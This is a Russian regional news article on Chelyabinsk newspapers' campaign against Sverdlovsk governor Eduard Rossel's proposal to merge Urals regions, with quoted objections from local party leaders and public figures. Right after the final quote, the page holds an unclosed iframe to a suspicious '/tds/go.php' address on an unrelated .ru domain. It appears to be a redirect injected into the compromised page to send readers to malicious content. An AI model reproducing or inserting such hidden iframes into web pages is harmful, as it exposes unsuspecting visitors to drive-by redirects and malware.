Челябинские СМИ продолжают войну с Росселем

На протяжении последних нескольких недель челябинские СМИ ведут настоящую пиар-войну с губернатором Свердловской области Эдуардом Росселем и его идеями об объединении регионов. Редкая областная многотиражка выходит сейчас без статьи, разоблачающей планы северного соседа на проведение «аншлюса» в отношении соседнего Кургана и самого Челябинска.
Если до недавнего времени основным рупором областных властей была газета «Возрождение Урала», то на этой неделе пальма первенства в борьбе с Росселем, похоже, может перейти к Уральским общественным ведомостям». Эта газета на только опубликовала интервью курганского губернатора Олега Богомолова, выступившего с резкой критикой в адрес Эдуарда Росселя, но и подкрепила его собственным материалом «Россель замахнулся на царство», своеобразной отповедью экспансионистской политике главы соседнего региона.
«Похоже, губернатору Свердловской области Эдуарду Росселю не дает покоя слава Герострата. По-следний запомнился тем, что сжег знаменитый храм, а наш северный сосед хочет выступить в качестве «собирателя» земель уральских. Под своим приглядом, естественно. Быть объединителем никто Росселя не просил: ни верховная власть, ни народ, проживающий на древней земле Рифейской. Тут главное — первым прокукарекать», – пишет газета.
«В качестве главного аргумента в пользу объединения челябинцев и свердловчан Россель приводит такой довод: только совместными усилиями можно «вытянуть» Курганскую область, экономическое положение которой намного хуже, чем у ее соседей. Однако возникает вопрос: откуда взялся такой альтруизм у всегда прижимистого правителя Среднего Урала? И хотят ли сами курганцы, чтобы их взяли на буксир? Трудно не согласиться с Петром Суминым, который считает, что Челябинская область является самодостаточным регионом и что «объединение со Свердловской областью принесет только потери», – отмечают «Уральские общественные ведомости».
Газета отмечает, что разговоры об объединении областей вызывают у южноуральцев неприкрытое раздражение и идиосинкразию, в доказательство чего приводят мнения авторитетных челябинцев.
Петр Свечников, председатель исполнительного комитета областной организации КПРФ:
«Такие вопросы не решаются директивами сверху. Необходимо учитывать мнение народа. А оно, на мой взгляд, не будет таким, как предполагает Россель. Во всяком случае, я не вижу никаких экономических обоснований для объединения с кем бы то ни было, поскольку Челябинская область самодостаточна. У нас неплохо развиваются промышленность, сельское хозяйство. Мы же не хотим это все загубить?!»
Александр Киселев, председатель Челябинского отделения Союза архитекторов России:
«Для чего объединяться, если можно и без этого иметь партнерские отношения? У архитекторов обеих областей связи давние и прочные. А вот административное объединение, на мой взгляд, нам не выгодно».
Владимир Груздев, руководитель Челябинского областного отделения ЛДПР:
«Объединение со Свердлов-ской областью я считаю нецелесообразным, хотя наша партия и выступает за административное переустройство страны: мы за то, чтобы Россия была унитарным государством. Но создавать гигант-скую Свердловско-Челябинскую область просто вредно. Другое дело, если бы курганцы захотели присоединиться к нам. Но об этом у них самих нужно спросить».
Иван Абрахин, директор гос-военцентра «Булат»:
«Смысл любого объединения либо в оказании помощи, либо в развитии. Ни того ни другого челябинцам не требуется».
<iframe src="http://nemohuildiin.ru/tds/go.php

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Июль 2020    »
ПнВтСрЧтПтСбВс
 12345
6789101112
13141516171819
20212223242526
2728293031 

Контакты